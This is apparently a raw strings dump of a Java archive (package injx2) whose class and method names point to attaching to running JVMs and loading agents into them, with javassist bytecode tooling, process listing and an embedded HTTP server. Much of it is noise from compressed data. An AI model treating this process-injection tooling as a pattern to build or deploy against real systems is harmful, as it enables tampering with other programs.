00000000E188 0 (Ljava/lang/String;)I 00000000E1A0 00000000E1A0 0 isArray 00000000E1B1 00000000E1B1 0 isAccessible File pos Mem pos ID Text ======== ======= == ==== 00000000E1C0 00000000E1C0 0 setAccessible 00000000E1D7 00000000E1D7 0 invoke 00000000E1DF 00000000E1DF 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 00000000E21C 00000000E21C 0 keySet 00000000E225 00000000E225 0 ()Ljava/util/Set; 00000000E239 00000000E239 0 java/util/Set 00000000E249 00000000E249 0 iterator 00000000E254 00000000E254 0 ()Ljava/util/Iterator; 00000000E26D 00000000E26D 0 hasNext 00000000E27E 00000000E27E 0 ()Ljava/lang/Object; 00000000E294 00000000E294 0 insertjar 00000000E2A0 00000000E2A0 0 loadClass 00000000E2AC 00000000E2AC 0 %(Ljava/lang/String;)Ljava/lang/Class; 00000000E2D5 00000000E2D5 0 newInstance 00000000E2E3 00000000E2E3 0 getMethods 00000000E2EF 00000000E2EF 0 substring 00000000E2FC 00000000E2FC 0 (II)Ljava/lang/String; 00000000E315 00000000E315 0 java/lang/System 00000000E328 00000000E328 0 getProperty 00000000E336 00000000E336 0 toLowerCase 00000000E344 00000000E344 0 contains 00000000E34F 00000000E34F 0 (Ljava/lang/CharSequence;)Z 00000000E36D 00000000E36D 0 getResponseHeaders 00000000E381 00000000E381 0 "()Lcom/sun/net/httpserver/Headers; 00000000E3A7 00000000E3A7 0 com/sun/net/httpserver/Headers 00000000E3CD 00000000E3CD 0 '(Ljava/lang/String;Ljava/lang/String;)V 00000000E3F8 00000000E3F8 0 length 00000000E407 00000000E407 0 sendResponseHeaders 00000000E41D 00000000E41D 0 (IJ)V 00000000E425 00000000E425 0 getResponseBody 00000000E437 00000000E437 0 ()Ljava/io/OutputStream; 00000000E452 00000000E452 0 java/io/OutputStream 00000000E469 00000000E469 0 close 00000000F964 00000000F964 0 injx2/HTTPServ.class 00000000F9C5 00000000F9C5 0 MyHandler 00000000F9D2 00000000F9D2 0 InnerClasses 00000000F9E1 00000000F9E1 0 <init> 00000000F9F7 00000000F9F7 0 LineNumberTable 00000000FA09 00000000FA09 0 LocalVariableTable 00000000FA25 00000000FA25 0 Linjx2/HTTPServ; 00000000FA44 00000000FA44 0 value 00000000FA50 00000000FA50 0 server 00000000FA58 00000000FA58 0 #Lcom/sun/net/httpserver/HttpServer; 00000000FA7F 00000000FA7F 0 Exceptions 00000000FA8F 00000000FA8F 0 SourceFile 00000000FA9C 00000000FA9C 0 HTTPServ.java 00000000FAB1 00000000FAB1 0 java/net/InetSocketAddress 00000000FAEC 00000000FAEC 0 injx2/HTTPServ$MyHandler 00000000FB1E 00000000FB1E 0 injx2/HTTPServ 00000000FB2F 00000000FB2F 0 java/lang/Object 00000000FB42 00000000FB42 0 java/io/IOException 00000000FB58 00000000FB58 0 java/lang/Integer 00000000FB6C 00000000FB6C 0 valueOf 00000000FB76 00000000FB76 0 (I)Ljava/lang/Integer; 00000000FB8F 00000000FB8F 0 intValue 00000000FB9F 00000000FB9F 0 !com/sun/net/httpserver/HttpServer 00000000FBC4 00000000FBC4 0 create 00000000FBCC 00000000FBCC 0 B(Ljava/net/InetSocketAddress;I)Lcom/sun/net/httpserver/HttpServer; 00000000FC12 00000000FC12 0 createContext 00000000FC21 00000000FC21 0 \(Ljava/lang/String;Lcom/sun/net/httpserver/HttpHandler;)Lcom/sun/net/httpserver/HttpContext; File pos Mem pos ID Text ======== ======= == ==== 00000000FC81 00000000FC81 0 java/util/concurrent/Executors 00000000FCA2 00000000FCA2 0 newCachedThreadPool 00000000FCB7 00000000FCB7 0 (()Ljava/util/concurrent/ExecutorService; 00000000FCE3 00000000FCE3 0 setExecutor 00000000FCF0 00000000FCF0 0 "(Ljava/util/concurrent/Executor;)V 00000000FD16 00000000FD16 0 start 00000000FE29 00000000FE29 0 injx2/INJX.class 000000010014 000000010014 0 Ljava/io/File; 000000010025 000000010025 0 <init> 00000001003B 00000001003B 0 LineNumberTable 00000001004D 00000001004D 0 LocalVariableTable 000000010069 000000010069 0 Linjx2/INJX; 000000010078 000000010078 0 getProcessNameFromPhl 000000010097 000000010097 0 &(Ljava/lang/String;)Ljava/lang/String; 0000000100C5 0000000100C5 0 Ljava/io/IOException; 0000000100E1 0000000100E1 0 Ljava/lang/InterruptedException; 000000010109 000000010109 0 Ljava/lang/Process; 00000001011F 00000001011F 0 sbInput 000000010129 000000010129 0 Ljava/lang/StringBuffer; 000000010144 000000010144 0 brInput 00000001014E 00000001014E 0 Ljava/io/BufferedReader; 000000010170 000000010170 0 Ljava/lang/String; 000000010184 000000010184 0 foundLine 000000010191 000000010191 0 result 00000001019F 00000001019F 0 Ljava/io/FileNotFoundException; 0000000101CD 0000000101CD 0 Ljava/lang/StringBuilder; 0000000101EF 0000000101EF 0 StackMapTable 00000001021A 00000001021A 0 getpid 000000010229 000000010229 0 runtime 000000010232 000000010232 0 $Ljava/lang/management/RuntimeMXBean; 000000010260 000000010260 0 Ljava/lang/reflect/Field; 000000010283 000000010283 0 Lsun/management/VMManagement; 0000000102A3 0000000102A3 0 pid_method 0000000102B0 0000000102B0 0 Ljava/lang/reflect/Method; 0000000102CC 0000000102CC 0 Ljava/lang/NoSuchFieldException; 0000000102F0 0000000102F0 0 Ljava/lang/SecurityException; 00000001030F 00000001030F 0 $Ljava/lang/IllegalArgumentException; 000000010336 000000010336 0 "Ljava/lang/IllegalAccessException; 00000001035B 00000001035B 0 !Ljava/lang/NoSuchMethodException; 00000001037F 00000001037F 0 -Ljava/lang/reflect/InvocationTargetException; 0000000103C9 0000000103C9 0 ([Ljava/lang/String;)V 0000000103E2 0000000103E2 0 descriptor 0000000103EE 0000000103EE 0 /Lcom/sun/tools/attach/VirtualMachineDescriptor; 000000010426 000000010426 0 Ljava/util/Iterator; 00000001043D 00000001043D 0 descriptors 00000001044B 00000001044B 0 Ljava/util/List; 00000001045D 00000001045D 0 2Lcom/sun/tools/attach/AttachNotSupportedException; 000000010492 000000010492 0 )Lcom/sun/tools/attach/AgentLoadException; 0000000104BE 0000000104BE 0 3Lcom/sun/tools/attach/AgentInitializationException; 0000000104F5 0000000104F5 0 Ljava/net/URISyntaxException; 000000010519 000000010519 0 %Lcom/sun/tools/attach/VirtualMachine; 000000010549 000000010549 0 [Ljava/lang/String; 00000001055F 00000001055F 0 LocalVariableTypeTable 000000010577 000000010577 0 ALjava/util/List<Lcom/sun/tools/attach/VirtualMachineDescriptor;>; 0000000105E1 0000000105E1 0 SourceFile 0000000105ED 0000000105ED 0 INJX.java 000000010604 000000010604 0 os.name 000000010631 000000010631 0 tasklist 000000010641 000000010641 0 java/io/IOException 00000001065C 00000001065C 0 java/lang/StringBuffer File pos Mem pos ID Text ======== ======= == ==== 000000010675 000000010675 0 java/io/BufferedReader 00000001068E 00000001068E 0 java/io/InputStreamReader 0000000106BC 0000000106BC 0 UNKNOWN 0000000106CB 0000000106CB 0 java/lang/StringBuilder 0000000106F8 0000000106F8 0 injx2/INJX 000000010724 000000010724 0 java/lang/InterruptedException 000000010758 000000010758 0 java/io/File 000000010767 000000010767 0 /proc/ 000000010770 000000010770 0 /psline 000000010784 000000010784 0 /cmdline 00000001078F 00000001078F 0 java/io/FileReader 0000000107A9 0000000107A9 0 java/io/FileNotFoundException 0000000107D3 0000000107D3 0 Known 0000000107FA 0000000107FA 0 sun/management/VMManagement 000000010818 000000010818 0 getProcessId 000000010827 000000010827 0 java/lang/Class 000000010841 000000010841 0 java/lang/Object 000000010859 000000010859 0 java/lang/Integer 000000010872 000000010872 0 java/lang/NoSuchFieldException 000000010893 000000010893 0 java/lang/SecurityException 0000000108B0 0000000108B0 0 "java/lang/IllegalArgumentException 0000000108D5 0000000108D5 0 java/lang/IllegalAccessException 0000000108F9 0000000108F9 0 java/lang/NoSuchMethodException 00000001091A 00000001091A 0 +java/lang/reflect/InvocationTargetException 000000010955 000000010955 0 +----------------- JVMs:------------------- 0000000109A0 0000000109A0 0 -com/sun/tools/attach/VirtualMachineDescriptor 0000000109EB 0000000109EB 0 *----------------------------------------- 000000010A2A 000000010A2A 0 0com/sun/tools/attach/AttachNotSupportedException 000000010A6E 000000010A6E 0 Loading: 000000010ACB 000000010ACB 0 Liberdade e gl 000000010ADF 000000010ADF 0 Libertad y gloria 000000010B25 000000010B25 0 'com/sun/tools/attach/AgentLoadException 000000010B4F 000000010B4F 0 1com/sun/tools/attach/AgentInitializationException 000000010B84 000000010B84 0 java/net/URISyntaxException 000000010BA7 000000010BA7 0 java/lang/String 000000010BBA 000000010BBA 0 java/lang/Process 000000010BCE 000000010BCE 0 java/util/List 000000010BDF 000000010BDF 0 java/util/Iterator 000000010BF3 000000010BF3 0 #com/sun/tools/attach/VirtualMachine 000000010C1A 000000010C1A 0 java/lang/Throwable 000000010C30 000000010C30 0 java/lang/System 000000010C43 000000010C43 0 getProperty 000000010C51 000000010C51 0 toLowerCase 000000010C5F 000000010C5F 0 ()Ljava/lang/String; 000000010C76 000000010C76 0 contains 000000010C81 000000010C81 0 (Ljava/lang/CharSequence;)Z 000000010C9F 000000010C9F 0 java/lang/Runtime 000000010CB3 000000010CB3 0 getRuntime 000000010CC0 000000010CC0 0 ()Ljava/lang/Runtime; 000000010CDE 000000010CDE 0 '(Ljava/lang/String;)Ljava/lang/Process; 000000010D09 000000010D09 0 printStackTrace 000000010D1B 000000010D1B 0 getInputStream 000000010D2C 000000010D2C 0 ()Ljava/io/InputStream; 000000010D46 000000010D46 0 (Ljava/io/InputStream;)V 000000010D61 000000010D61 0 (Ljava/io/Reader;)V 000000010D77 000000010D77 0 readLine 000000010D82 000000010D82 0 append 000000010D8A 000000010D8A 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000010DBB 000000010DBB 0 toString 000000010DC5 000000010DC5 0 ,(Ljava/lang/String;)Ljava/lang/StringBuffer; File pos Mem pos ID Text ======== ======= == ==== 000000010DF5 000000010DF5 0 getName 000000010DFF 000000010DFF 0 java/util/logging/Logger 000000010E19 000000010E19 0 getLogger 000000010E25 000000010E25 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 000000010E57 000000010E57 0 java/util/logging/Level 000000010E71 000000010E71 0 SEVERE 000000010E7A 000000010E7A 0 Ljava/util/logging/Level; 000000010E9B 000000010E9B 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 000000010EE2 000000010EE2 0 waitFor 000000010EEC 000000010EEC 0 destroy 000000010EF6 000000010EF6 0 indexOf 000000010F00 000000010F00 0 (Ljava/lang/String;)I 000000010F17 000000010F17 0 substring 000000010F24 000000010F24 0 (II)Ljava/lang/String; 000000010F3D 000000010F3D 0 (Ljava/lang/String;)V 000000010F55 000000010F55 0 exists 000000010F64 000000010F64 0 (Ljava/io/File;)V 000000010F78 000000010F78 0 replaceAll 000000010F84 000000010F84 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 000000010FBF 000000010FBF 0 &java/lang/management/ManagementFactory 000000010FE9 000000010FE9 0 getRuntimeMXBean 000000010FFB 000000010FFB 0 &()Ljava/lang/management/RuntimeMXBean; 000000011025 000000011025 0 getClass 000000011030 000000011030 0 ()Ljava/lang/Class; 000000011046 000000011046 0 getDeclaredField 000000011058 000000011058 0 -(Ljava/lang/String;)Ljava/lang/reflect/Field; 000000011089 000000011089 0 java/lang/reflect/Field 0000000110A3 0000000110A3 0 setAccessible 0000000110BF 0000000110BF 0 &(Ljava/lang/Object;)Ljava/lang/Object; 0000000110E9 0000000110E9 0 getDeclaredMethod 0000000110FC 0000000110FC 0 @(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method; 000000011140 000000011140 0 java/lang/reflect/Method 00000001115B 00000001115B 0 invoke 000000011163 000000011163 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 0000000111A0 0000000111A0 0 intValue 0000000111B2 0000000111B2 0 ()Ljava/util/List; 0000000111CD 0000000111CD 0 Ljava/io/PrintStream; 0000000111E5 0000000111E5 0 java/io/PrintStream 0000000111FB 0000000111FB 0 println 000000011205 000000011205 0 iterator 000000011210 000000011210 0 ()Ljava/util/Iterator; 000000011229 000000011229 0 hasNext 00000001123A 00000001123A 0 ()Ljava/lang/Object; 000000011256 000000011256 0 displayName 000000011264 000000011264 0 matches 00000001126E 00000001126E 0 (Ljava/lang/String;)Z 000000011286 000000011286 0 attach 00000001128E 00000001128E 0 9(Ljava/lang/String;)Lcom/sun/tools/attach/VirtualMachine; 0000000112CB 0000000112CB 0 parseInt 0000000112D6 0000000112D6 0 getProtectionDomain 0000000112EB 0000000112EB 0 "()Ljava/security/ProtectionDomain; 000000011311 000000011311 0 java/security/ProtectionDomain 000000011332 000000011332 0 getCodeSource 000000011342 000000011342 0 ()Ljava/security/CodeSource; 000000011361 000000011361 0 java/security/CodeSource 00000001137C 00000001137C 0 getLocation 00000001138A 00000001138A 0 ()Ljava/net/URL; 00000001139D 00000001139D 0 java/net/URL 0000000113AC 0000000113AC 0 toURI 0000000113B4 0000000113B4 0 ()Ljava/net/URI; File pos Mem pos ID Text ======== ======= == ==== 0000000113C7 0000000113C7 0 java/net/URI 0000000113D6 0000000113D6 0 getPath 0000000113E0 0000000113E0 0 getAbsolutePath 0000000113F1 0000000113F1 0 loadAgent 0000000113FD 0000000113FD 0 '(Ljava/lang/String;Ljava/lang/String;)V 000000011428 000000011428 0 detach 000000011FD0 000000011FD0 0 injx2/ViewClassLoader.class 000000012059 000000012059 0 <init> 00000001206F 00000001206F 0 LineNumberTable 000000012081 000000012081 0 LocalVariableTable 00000001209D 00000001209D 0 Linjx2/ViewClassLoader; 0000000120B6 0000000120B6 0 loadClass 0000000120C2 0000000120C2 0 &(Ljava/lang/String;Z)Ljava/lang/Class; 0000000120FC 0000000120FC 0 Ljava/io/IOException; 000000012114 000000012114 0 filename 00000001211F 00000001211F 0 Ljava/lang/String; 000000012134 000000012134 0 Ljava/lang/Exception; 000000012153 000000012153 0 resolve 000000012165 000000012165 0 Ljava/lang/Class; 000000012179 000000012179 0 StackMapTable 000000012195 000000012195 0 Exceptions 0000000121A2 0000000121A2 0 loadClassData 0000000121B2 0000000121B2 0 (Ljava/lang/String;)[B 0000000121CB 0000000121CB 0 classbytes 0000000121D8 0000000121D8 0 SourceFile 0000000121E5 0000000121E5 0 ViewClassLoader.java 000000012206 000000012206 0 java/lang/StringBuilder 000000012235 000000012235 0 .class 00000001224C 00000001224C 0 java/lang/ClassNotFoundException 000000012275 000000012275 0 java/io/IOException 00000001228B 00000001228B 0 Error reading file: 0000000122A7 0000000122A7 0 java/lang/Exception 0000000122D2 0000000122D2 0 injx2/ViewClassLoader 0000000122EA 0000000122EA 0 java/lang/ClassLoader 000000012302 000000012302 0 java/lang/Class 000000012314 000000012314 0 java/lang/String 000000012327 000000012327 0 findLoadedClass 000000012338 000000012338 0 %(Ljava/lang/String;)Ljava/lang/Class; 000000012361 000000012361 0 java/io/File 000000012370 000000012370 0 separatorChar 000000012384 000000012384 0 replace 00000001238E 00000001238E 0 (CC)Ljava/lang/String; 0000000123A7 0000000123A7 0 append 0000000123AF 0000000123AF 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 0000000123E0 0000000123E0 0 toString 0000000123EB 0000000123EB 0 ()Ljava/lang/String; 000000012402 000000012402 0 defineClass 00000001240F 00000001240F 0 )(Ljava/lang/String;[BII)Ljava/lang/Class; 00000001243C 00000001243C 0 (Ljava/lang/String;)V 000000012454 000000012454 0 findSystemClass 000000012466 000000012466 0 resolveClass 000000012475 000000012475 0 (Ljava/lang/Class;)V 00000001248C 00000001248C 0 injx2/Global 00000001249B 00000001249B 0 classmap 0000000124A6 0000000124A6 0 Ljava/util/Map; 0000000124B8 0000000124B8 0 java/util/Map 0000000124CD 0000000124CD 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000012757 000000012757 0 injx2/javassist/UT 000000012771 000000012771 0 #z\ux 0000000127A1 0000000127A1 0 injx2/javassist/bytecode/UT File pos Mem pos ID Text ======== ======= == ==== 0000000127C4 0000000127C4 0 #z\ux 0000000127F4 0000000127F4 0 com/UT 000000012802 000000012802 0 %z\ux 000000012832 000000012832 0 com/sun/UT 000000012844 000000012844 0 %z\ux 000000012874 000000012874 0 com/sun/tools/UT 00000001288C 00000001288C 0 %z\ux 0000000128BC 0000000128BC 0 com/sun/tools/attach/UT 0000000128DB 0000000128DB 0 %z\ux 00000001290B 00000001290B 0 com/sun/tools/attach/AttachPermission.classUT 000000012940 000000012940 0 %z\ux 000000012960 000000012960 0 A,bDc 000000012B9B 000000012B9B 0 com/sun/tools/attach/AttachNotSupportedException.classUT 000000012BDB 000000012BDB 0 %z\ux 000000012C51 000000012C51 0 ]34&J 000000012C5A 000000012C5A 0 I{#f1 000000012D27 000000012D27 0 com/sun/tools/attach/AgentLoadException.classUT 000000012D5E 000000012D5E 0 %z\ux 000000012DD6 000000012DD6 0 P*qSL 000000012E19 000000012E19 0 ,'~wun5 000000012EA5 000000012EA5 0 com/sun/tools/attach/AgentInitializationException.classUT 000000012EE6 000000012EE6 0 %z\ux 000000012F07 000000012F07 0 G PPp 000000013054 000000013054 0 K" c= 000000013085 000000013085 0 com/sun/tools/attach/spi/UT 0000000130A8 0000000130A8 0 %z\ux 0000000130D8 0000000130D8 0 sun/UT 0000000130E6 0000000130E6 0 %z\ux 000000013116 000000013116 0 sun/tools/UT 00000001312A 00000001312A 0 %z\ux 00000001315A 00000001315A 0 sun/jvmstat/UT 000000013170 000000013170 0 %z\ux 0000000131A0 0000000131A0 0 sun/tools/attach/UT 0000000131BB 0000000131BB 0 ?z\ux 0000000131EB 0000000131EB 0 sun/tools/attach/WindowsVirtualMachine.classUT 000000013221 000000013221 0 %z\ux 000000013250 000000013250 0 | (Bm 000000013378 000000013378 0 Q}Z<. 0000000133D2 0000000133D2 0 q4'A 0000000133D8 0000000133D8 0 FE*iY 00000001341D 00000001341D 0 fY&QP 000000013475 000000013475 0 TIoR; 000000013555 000000013555 0 U4"OE 00000001355E 00000001355E 0 ,v!_E 000000013610 000000013610 0 E.rhm 00000001363D 00000001363D 0 ;N$qo 0000000137B1 0000000137B1 0 'ihTWhh2Wh 000000013835 000000013835 0 sun/tools/attach/WindowsAttachProvider.classUT 00000001386B 00000001386B 0 %z\ux 0000000138A9 0000000138A9 0 YgfAl 000000013973 000000013973 0 PGLrS 0000000139CB 0000000139CB 0 6SR+r/9 000000013C15 000000013C15 0 w8<|/; 000000013DD4 000000013DD4 0 q+pv 000000013E13 000000013E13 0 Jy~R| 000000013EE6 000000013EE6 0 _u15p 000000013F1C 000000013F1C 0 uA!&q 000000013FDB 000000013FDB 0 sun/tools/attach/HotSpotVirtualMachine.classUT 000000014011 000000014011 0 %z\ux 000000014167 000000014167 0 v3Ivu File pos Mem pos ID Text ======== ======= == ==== 0000000141DE 0000000141DE 0 h [x\ 000000014210 000000014210 0 I'mCz~ 000000014282 000000014282 0 Rs);\ 00000001428B 00000001428B 0 ;55S@G 000000014314 000000014314 0 ,CMuX 000000014365 000000014365 0 GfY,N}he 000000014379 000000014379 0 }BMmg 0000000143FD 0000000143FD 0 S2ZdDd 000000014415 000000014415 0 +#.cH 000000014477 000000014477 0 a]8X> 000000014486 000000014486 0 ,o2PF 00000001454F 00000001454F 0 x5Tb1 000000014944 000000014944 0 sun/tools/attach/WindowsVirtualMachine$PipedInputStream.classUT 00000001498B 00000001498B 0 1z\ux 000000014B05 000000014B05 0 1JY9zQ! 000000014B3B 000000014B3B 0 hbFEyr 000000014C0A 000000014C0A 0 sun/jvmstat/monitor/UT 000000014C28 000000014C28 0 %z\ux 000000014C58 000000014C58 0 sun/jvmstat/perfdata/UT 000000014C77 000000014C77 0 %z\ux 000000014CA7 000000014CA7 0 sun/jvmstat/monitor/remote/UT 000000014CCC 000000014CCC 0 %z\ux 000000014CFC 000000014CFC 0 sun/jvmstat/perfdata/monitor/UT 000000014D23 000000014D23 0 %z\ux 000000014D53 000000014D53 0 sun/jvmstat/perfdata/monitor/protocol/UT 000000014D83 000000014D83 0 %z\ux 000000014DB3 000000014DB3 0 sun/jvmstat/perfdata/monitor/v2_0/UT 000000014DDF 000000014DDF 0 %z\ux 000000014E0F 000000014E0F 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBuffer.classUT 000000014E4F 000000014E4F 0 %z\ux 000000014F84 000000014F84 0 +UlQq 0000000150B2 0000000150B2 0 A5sN5sr 0000000150E7 0000000150E7 0 &VA*u 00000001513D 00000001513D 0 uuCRk 000000015163 000000015163 0 7x}kZ= 00000001518C 00000001518C 0 jz%IVKC 00000001522D 00000001522D 0 THbj@ 0000000152CD 0000000152CD 0 Q<)Vr e 00000001535A 00000001535A 0 5\@QH 000000015392 000000015392 0 S]uu' 0000000153B4 0000000153B4 0 bw$LVq 0000000153E9 0000000153E9 0 75 zx 00000001540A 00000001540A 0 ?Eit6 0000000154FE 0000000154FE 0 1Lb( 000000015607 000000015607 0 _PHgN 00000001562D 00000001562D 0 Io8aIU 00000001565A 00000001565A 0 B0[d', 00000001581D 00000001581D 0 3t0t2 000000015C44 000000015C44 0 f%YTcN 000000015C57 000000015C57 0 /!l-/ 000000015D76 000000015D76 0 !;%=dy 000000015E78 000000015E78 0 oa{N!n 000000015FB4 000000015FB4 0 sun/jvmstat/perfdata/monitor/protocol/local/UT 000000015FEA 000000015FEA 0 %z\ux 00000001601A 00000001601A 0 META-INF/services/UT 000000016036 000000016036 0 %z\ux 000000016066 000000016066 0 META-INF/services/com.sun.tools.attach.spi.AttachProviderUT 0000000160A9 0000000160A9 0 %z\ux 0000000160D9 0000000160D9 0 4W.wr 000000016120 000000016120 0 Y2gj" File pos Mem pos ID Text ======== ======= == ==== 000000016213 000000016213 0 META-INF/services/com.sun.tools.internal.xjc.PluginUT 000000016250 000000016250 0 %z\ux 0000000162EE 0000000162EE 0 META-INF/services/com.sun.mirror.apt.AnnotationProcessorFactoryUT 000000016337 000000016337 0 %z\ux 000000016349 000000016349 0 com.sun.istack.internal.ws.AnnotationProcessorFactoryImpl 00000001638E 00000001638E 0 rzB#n 0000000163A1 0000000163A1 0 META-INF/services/com.sun.jdi.connect.spi.TransportServiceUT 0000000163E5 0000000163E5 0 %z\ux 000000016403 000000016403 0 B (hR 000000016531 000000016531 0 META-INF/services/com.sun.jdi.connect.ConnectorUT 00000001656A 00000001656A 0 %z\ux 00000001658E 00000001658E 0 !V(DSRED| 0000000165AD 0000000165AD 0 eO&pz2 0000000165C6 0000000165C6 0 p}uu} 000000016708 000000016708 0 injx2/javassist/NotFoundException.classUT 000000016739 000000016739 0 #z\ux 0000000167C5 0000000167C5 0 =IXn(K6 00000001685D 00000001685D 0 @SW<[ 000000016884 000000016884 0 "G3@71 0000000168B4 0000000168B4 0 6F<Dd 0000000168DC 0000000168DC 0 bNC7V7 0000000168EE 0000000168EE 0 injx2/javassist/JarClassPath.classUT 00000001691A 00000001691A 0 #z\ux 000000016AD3 000000016AD3 0 hrgcB 000000016B85 000000016B85 0 *.Im"Cv 000000016D05 000000016D05 0 'I+DT 000000016DE1 000000016DE1 0 0?y!T 000000016E13 000000016E13 0 injx2/javassist/DirClassPath.classUT 000000016E3F 000000016E3F 0 #z\ux 000000016EE9 000000016EE9 0 7:6t|+ 000000017159 000000017159 0 s\d62 000000017186 000000017186 0 2jw[E 00000001722D 00000001722D 0 /q<9] 000000017272 000000017272 0 injx2/javassist/CtPrimitiveType.classUT 0000000172A1 0000000172A1 0 #z\ux 000000017496 000000017496 0 "nL*]( 0000000174E5 0000000174E5 0 I)R]! 0000000174EB 0000000174EB 0 J5C3$ 00000001758C 00000001758C 0 injx2/javassist/CtMethod.classUT 0000000175B4 0000000175B4 0 #z\ux 0000000175C7 0000000175C7 0 X x\U 0000000176A5 0000000176A5 0 dV6Fe 0000000176F3 0000000176F3 0 5l;vZ 000000017750 000000017750 0 h2fwl 0000000177AC 0000000177AC 0 f)JgW 00000001786F 00000001786F 0 Y&7k, 0000000179BF 0000000179BF 0 xRf{0 000000017A11 000000017A11 0 y4F)CU 000000017B7F 000000017B7F 0 $YZjNis# 000000017E79 000000017E79 0 :Y=Lt 000000018000 000000018000 0 injx2/javassist/CtMember$Cache.classUT 00000001802E 00000001802E 0 #z\ux 000000018206 000000018206 0 L#ju_TP 000000018273 000000018273 0 up=TC 000000018353 000000018353 0 Ql'%[ 000000018362 000000018362 0 W[8>o 000000018529 000000018529 0 h$Lv+ 00000001854D 00000001854D 0 9/zU!'J 0000000185DE 0000000185DE 0 injx2/javassist/CtMember.classUT 000000018606 000000018606 0 #z\ux File pos Mem pos ID Text ======== ======= == ==== 000000018621 000000018621 0 L:i:mi 000000018656 000000018656 0 P\|e- 00000001871D 00000001871D 0 f*K$6 00000001874B 00000001874B 0 sG< B 00000001875F 00000001875F 0 ccVNa 0000000187B0 0000000187B0 0 G<3}a 0000000187F7 0000000187F7 0 ikZtX 00000001880C 00000001880C 0 gL;+A- 000000018896 000000018896 0 'zN$j~ 000000018968 000000018968 0 &(<Ci 000000018981 000000018981 0 1F:XF 000000018B05 000000018B05 0 C8LS}~K( 000000018B5B 000000018B5B 0 injx2/javassist/CtField.classUT 000000018B82 000000018B82 0 #z\ux 000000018B9F 000000018B9F 0 N&7!LB 000000018C78 000000018C78 0 Bv*}t 000000018D40 000000018D40 0 Q&}K8lF;BF,f 000000018D9A 000000018D9A 0 I[5d5 000000018E66 000000018E66 0 ,yFPis: 000000018E9A 000000018E9A 0 hVs);o 000000018FE8 000000018FE8 0 L$y]% 0000000190E7 0000000190E7 0 ;t>J?GD 000000019112 000000019112 0 z04hFA 00000001919D 00000001919D 0 X0=|u 0000000192D1 0000000192D1 0 -A;}RZ|% 000000019379 000000019379 0 1:jJM 000000019410 000000019410 0 anZWj 00000001946A 00000001946A 0 U!&6;e 00000001947F 00000001947F 0 7?Ux[ 000000019614 000000019614 0 3D%4L 00000001988B 00000001988B 0 J3W5UxN 0000000199A4 0000000199A4 0 uJdNQ{ 000000019BD2 000000019BD2 0 injx2/javassist/CtConstructor.classUT 000000019BFF 000000019BFF 0 #z\ux 000000019D96 000000019D96 0 9%R-5: 000000019E39 000000019E39 0 ]-xN_, 000000019F5E 000000019F5E 0 r$]?eGo4 00000001A021 00000001A021 0 1NvDG 00000001A0F5 00000001A0F5 0 &4w54v 00000001A168 00000001A168 0 Y|A0o 00000001A191 00000001A191 0 r\!{B 00000001A212 00000001A212 0 MOt0< 00000001A253 00000001A253 0 5e*] : 00000001A268 00000001A268 0 3#NdQ>x 00000001A2C6 00000001A2C6 0 'td40 00000001A2F3 00000001A2F3 0 <zLo- 00000001A3AB 00000001A3AB 0 ,SNU<4 00000001A4BC 00000001A4BC 0 #Tz.j 00000001A4D8 00000001A4D8 0 N(QnN 00000001A53A 00000001A53A 0 )Tq4{ 00000001A67F 00000001A67F 0 rUq;i 00000001A7F6 00000001A7F6 0 Lac-C 00000001A836 00000001A836 0 /fq8D? 00000001A924 00000001A924 0 =nm:1 00000001A9EA 00000001A9EA 0 Q*E/~ 00000001AAF0 00000001AAF0 0 c& 8Ee+ 00000001AB59 00000001AB59 0 injx2/javassist/CtClassType.classUT 00000001AB84 00000001AB84 0 #z\ux 00000001ACD8 00000001ACD8 0 yr/[v 00000001AFDF 00000001AFDF 0 @@8+@ File pos Mem pos ID Text ======== ======= == ==== 00000001B2EF 00000001B2EF 0 8~na& 00000001B309 00000001B309 0 +1k/f 00000001B6A5 00000001B6A5 0 %J-7L 00000001B6E7 00000001B6E7 0 W/Qb+ 00000001B6F7 00000001B6F7 0 UTTeV 00000001B7F9 00000001B7F9 0 EJ/)3 00000001B820 00000001B820 0 z:}%_cg 00000001B92E 00000001B92E 0 mrxl = 00000001BC4C 00000001BC4C 0 4]O?D 00000001BCF6 00000001BCF6 0 _B7v2w 00000001BD2D 00000001BD2D 0 _AQ~M 00000001BDAA 00000001BDAA 0 \evi3cv 00000001BEEB 00000001BEEB 0 3|1*f 00000001BFF1 00000001BFF1 0 rcx=c 00000001C085 00000001C085 0 Z-jS[t 00000001C185 00000001C185 0 6hc3p 00000001C1A2 00000001C1A2 0 LHmN,V&Hu 00000001C3AF 00000001C3AF 0 <P>':1 00000001C484 00000001C484 0 s>><e8' 00000001C77E 00000001C77E 0 fb#ko 00000001CA66 00000001CA66 0 y/N,{ 00000001CB2C 00000001CB2C 0 7S)Mk 00000001CE2C 00000001CE2C 0 7f4UX{ 00000001CE44 00000001CE44 0 ""/1[ 00000001CEE1 00000001CEE1 0 Q 6Q 6 00000001CFCA 00000001CFCA 0 VuX~'Y~ 00000001D042 00000001D042 0 6zPv?& 00000001D0D0 00000001D0D0 0 w<VY> 00000001D18E 00000001D18E 0 _qRM~ 00000001D292 00000001D292 0 G8<@? 00000001D2BA 00000001D2BA 0 OH|@6} 00000001D411 00000001D411 0 SY%oc 00000001D605 00000001D605 0 ->$+?Q% 00000001D745 00000001D745 0 V"-PV"-P 00000001D8A9 00000001D8A9 0 D(YWlF 00000001DCE6 00000001DCE6 0 RB2t$ 00000001DCFD 00000001DCFD 0 V<gah 00000001E06B 00000001E06B 0 6G]L@{8> 00000001E1D5 00000001E1D5 0 t~RZh 00000001E2F6 00000001E2F6 0 zmB-E 00000001E32B 00000001E32B 0 |L3m&E 00000001E460 00000001E460 0 g f;5X 00000001E46D 00000001E46D 0 +z![S 00000001E5CC 00000001E5CC 0 QhBlYI 00000001E824 00000001E824 0 l=[_fk 00000001E948 00000001E948 0 7Y%OI 00000001EB10 00000001EB10 0 6]L,n1 00000001ED3B 00000001ED3B 0 IR,%) 00000001ED96 00000001ED96 0 .O{YV 00000001EE2B 00000001EE2B 0 